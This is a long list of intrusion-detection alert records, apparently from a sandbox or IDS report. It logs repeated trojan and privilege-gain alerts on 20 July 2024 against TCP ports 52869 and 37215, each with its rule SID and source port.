                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.049485
                      SID:2831300
                      Source Port:39522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.730392
                      SID:2025132
                      Source Port:52548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:59874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.803911
                      SID:2027339
                      Source Port:58846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2829579
                      Source Port:57738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.844694
                      SID:2027339
                      Source Port:51090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2829579
                      Source Port:46016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.147289
                      SID:2027339
                      Source Port:47782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.148759
                      SID:2027339
                      Source Port:60412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2835222
                      Source Port:51864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.680685
                      SID:2027339
                      Source Port:54018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.794519
                      SID:2831300
                      Source Port:50970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.013827
                      SID:2025132
                      Source Port:57882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.508271
                      SID:2027339
                      Source Port:60680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.901420
                      SID:2831300
                      Source Port:53268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.512168
                      SID:2025132
                      Source Port:38104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2027339
                      Source Port:44428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.520139
                      SID:2025132
                      Source Port:36254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.315740
                      SID:2831300
                      Source Port:58126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.105908
                      SID:2835222
                      Source Port:53884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.538390
                      SID:2027339
                      Source Port:53262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591862
                      SID:2027339
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.719313
                      SID:2025132
                      Source Port:58424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044152
                      SID:2835222
                      Source Port:34678
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.454456
                      SID:2025132
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2027339
                      Source Port:54340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2829579
                      Source Port:33904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.193882
                      SID:2027339
                      Source Port:41006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:45042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633810
                      SID:2829579
                      Source Port:40002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.938491
                      SID:2027339
                      Source Port:46086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.259813
                      SID:2025132
                      Source Port:46320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.551511
                      SID:2831300
                      Source Port:33580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.504220
                      SID:2025132
                      Source Port:45026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.300817
                      SID:2027339
                      Source Port:52658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:40850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.882291
                      SID:2829579
                      Source Port:34656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.870904
                      SID:2025132
                      Source Port:46610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.620386
                      SID:2831300
                      Source Port:49108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.660016
                      SID:2831300
                      Source Port:57142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2829579
                      Source Port:53580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.261844
                      SID:2831300
                      Source Port:36412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.603553
                      SID:2831300
                      Source Port:59972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2835222
                      Source Port:50524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990165
                      SID:2835222
                      Source Port:46280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.576249
                      SID:2027339
                      Source Port:34132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.932550
                      SID:2027339
                      Source Port:49520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.304767
                      SID:2027339
                      Source Port:33306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2027339
                      Source Port:50904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.007136
                      SID:2831300
                      Source Port:60990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.599834
                      SID:2027339
                      Source Port:48136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:47320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.337240
                      SID:2027339
                      Source Port:37948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2835222
                      Source Port:58804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.201976
                      SID:2027339
                      Source Port:53466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.845560
                      SID:2025132
                      Source Port:43370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.385543
                      SID:2025132
                      Source Port:37590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.508957
                      SID:2831300
                      Source Port:43964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.388031
                      SID:2027339
                      Source Port:60752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.775082
                      SID:2027339
                      Source Port:38104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.177524
                      SID:2027339
                      Source Port:32964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.234150
                      SID:2025132
                      Source Port:33340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2835222
                      Source Port:54822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.891414
                      SID:2027339
                      Source Port:34962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.979094
                      SID:2025132
                      Source Port:41372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.806645
                      SID:2027339
                      Source Port:41902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.285244
                      SID:2027339
                      Source Port:55514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2829579
                      Source Port:41738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.013456
                      SID:2829579
                      Source Port:50252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:41962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2831300
                      Source Port:32914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974656
                      SID:2829579
                      Source Port:55358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982801
                      SID:2829579
                      Source Port:46168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.416206
                      SID:2831300
                      Source Port:59336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.483105
                      SID:2025132
                      Source Port:49882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.666264
                      SID:2027339
                      Source Port:41658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.494330
                      SID:2831300
                      Source Port:48532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.912088
                      SID:2027339
                      Source Port:34906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.648203
                      SID:2027339
                      Source Port:44442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.699478
                      SID:2831300
                      Source Port:39250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.188768
                      SID:2027339
                      Source Port:52494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.960623
                      SID:2831300
                      Source Port:45334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.057358
                      SID:2831300
                      Source Port:54552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2829579
                      Source Port:38954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596401
                      SID:2831300
                      Source Port:39248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.946478
                      SID:2025132
                      Source Port:57058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.050420
                      SID:2831300
                      Source Port:60922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.672944
                      SID:2831300
                      Source Port:50556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:48.156942
                      SID:2027339
                      Source Port:35430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2829579
                      Source Port:45260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.503352
                      SID:2025132
                      Source Port:57016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.466756
                      SID:2027339
                      Source Port:40356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.932550
                      SID:2831300
                      Source Port:54136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.756983
                      SID:2025132
                      Source Port:60230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2835222
                      Source Port:56934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:43802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.921076
                      SID:2027339
                      Source Port:35244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.028836
                      SID:2835222
                      Source Port:45492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.113254
                      SID:2829579
                      Source Port:56802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2829579
                      Source Port:58620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.208558
                      SID:2831300
                      Source Port:38938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.302645
                      SID:2027339
                      Source Port:44116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2835222
                      Source Port:46836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2835222
                      Source Port:32822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.295391
                      SID:2027339
                      Source Port:50356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.980256
                      SID:2831300
                      Source Port:45806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:48984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.323043
                      SID:2831300
                      Source Port:59916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2829579
                      Source Port:60510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.510301
                      SID:2025132
                      Source Port:41918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.484578
                      SID:2027339
                      Source Port:58038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.809716
                      SID:2025132
                      Source Port:37290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.233561
                      SID:2025132
                      Source Port:54774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.322288
                      SID:2027339
                      Source Port:60192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.799973
                      SID:2027339
                      Source Port:34198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.775483
                      SID:2025132
                      Source Port:43032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.369883
                      SID:2027339
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.600114
                      SID:2027339
                      Source Port:44382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2829579
                      Source Port:41800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.056707
                      SID:2027339
                      Source Port:34134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258403
                      SID:2025132
                      Source Port:35944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.128003
                      SID:2027339
                      Source Port:50218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.643745
                      SID:2027339
                      Source Port:53574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.780168
                      SID:2025132
                      Source Port:46568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.721582
                      SID:2025132
                      Source Port:40048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2835222
                      Source Port:53980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2835222
                      Source Port:32922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2835222
                      Source Port:38402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.660997
                      SID:2831300
                      Source Port:53996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.960642
                      SID:2829579
                      Source Port:54608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.582631
                      SID:2025132
                      Source Port:37576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2831300
                      Source Port:52816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.739158
                      SID:2829579
                      Source Port:52978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2027339
                      Source Port:43632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.916672
                      SID:2831300
                      Source Port:46732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2835222
                      Source Port:34626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.227281
                      SID:2025132
                      Source Port:59816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.713195
                      SID:2025132
                      Source Port:47504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.674845
                      SID:2025132
                      Source Port:44134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.880291
                      SID:2027339
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.510114
                      SID:2027339
                      Source Port:49522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.664606
                      SID:2835222
                      Source Port:36288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:18.238800
                      SID:2027339
                      Source Port:35348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.193913
                      SID:2025132
                      Source Port:54490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.978835
                      SID:2027339
                      Source Port:40016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:35460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:41918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2829579
                      Source Port:34426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.993925
                      SID:2027339
                      Source Port:36958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.154601
                      SID:2027339
                      Source Port:37598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654173
                      SID:2829579
                      Source Port:53600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2829579
                      Source Port:54644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807101
                      SID:2831300
                      Source Port:53936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.632574
                      SID:2027339
                      Source Port:49030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.095767
                      SID:2027339
                      Source Port:42164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.110964
                      SID:2027339
                      Source Port:60932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650337
                      SID:2829579
                      Source Port:54152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.412156
                      SID:2027339
                      Source Port:44554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.645032
                      SID:2025132
                      Source Port:54798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.707284
                      SID:2025132
                      Source Port:47538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.749469
                      SID:2831300
                      Source Port:46454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.302806
                      SID:2025132
                      Source Port:38432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.370646
                      SID:2025132
                      Source Port:36080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.486502
                      SID:2025132
                      Source Port:55102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.448947
                      SID:2027339
                      Source Port:41332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.158864
                      SID:2025132
                      Source Port:42424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:38654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.901550
                      SID:2025132
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:59564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.119631
                      SID:2835222
                      Source Port:58596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2829579
                      Source Port:48384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2835222
                      Source Port:42054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.599458
                      SID:2831300
                      Source Port:34350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:57730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.064977
                      SID:2025132
                      Source Port:45862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.652628
                      SID:2025132
                      Source Port:50702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.919746
                      SID:2831300
                      Source Port:57832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:37.919900
                      SID:2025132
                      Source Port:35978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.072139
                      SID:2025132
                      Source Port:45316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.132510
                      SID:2835222
                      Source Port:40272
                      Destination Port:37215
                      Protocol:TCP
